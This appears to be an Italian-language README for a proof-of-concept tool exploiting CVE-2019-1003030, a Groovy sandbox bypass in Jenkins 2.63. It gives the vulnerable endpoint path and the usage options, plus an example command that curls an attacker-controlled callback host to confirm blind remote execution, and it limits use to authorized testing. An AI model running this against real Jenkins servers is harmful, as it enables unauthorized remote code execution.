
PoC per jenkins 2.63 CVE-2019-1003030
Questo progetto automatizza la creazione e l'invio di payload Groovy all'endpoint di validazione SecureGroovyScript di Jenkins utilizzato da Jenkins 2.63. Lo strumento supporta sia l'esecuzione interattiva che quella one-shot. L'exploit non restituisce output, quindi dovrai effettuare alcune verifiche, come fare curl al tuo AP, per assicurarti che funzioni.
Lo strumento supporta entrambe le modalità:
Disclaimer
Questo progetto è destinato solo a scopi di ricerca sulla sicurezza, CTF, ambienti di laboratorio e test di penetrazione autorizzati. Non utilizzarlo contro sistemi senza autorizzazione esplicita.
usage: Poc.py -u http://10.10.10.10:8080/ [-c 'curl http://10.10.10.9/callback'] [-X POST] [-p /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript]
PoC for sandbox bypass for jenkins 2.63
options:
-h, --help show this help message and exit
-u, --url URL ip of target
-X, --method METHOD post or get
-b, --breadcrum BREADCRUM
optional jenkins crumb string
-c, --command COMMAND
command to run on jenkins, not output expected
-p, --path PATH path to the script, you might prepend more
Ometti l'opzione -c per accedere a un prompt interattivo. Esempio qui sotto; purtroppo non c'è output, quindi finché non ricevi un 404 dovrebbe funzionare.
